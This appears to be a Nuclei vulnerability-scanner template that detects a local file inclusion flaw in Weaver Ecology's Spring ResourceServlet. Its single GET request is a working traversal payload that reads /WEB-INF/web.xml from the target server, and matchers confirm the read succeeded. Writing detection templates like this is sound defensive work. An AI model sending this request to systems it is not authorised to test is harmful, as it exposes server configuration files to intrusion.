nuclei-templates/vulnerabilities/weaver/ecology/ecology-springframework-dir...

29 lines
741 B
YAML

id: ecology-springframework-directory-traversal
info:
name: Ecology Springframework - Local File Inclusion
author: princechaddha
severity: high
description: Ecology Springframework is vulnerable to local file inclusion.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: ecology,springframework,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<url-pattern>/weaver/"
part: body
# Enhanced by mp on 2022/08/01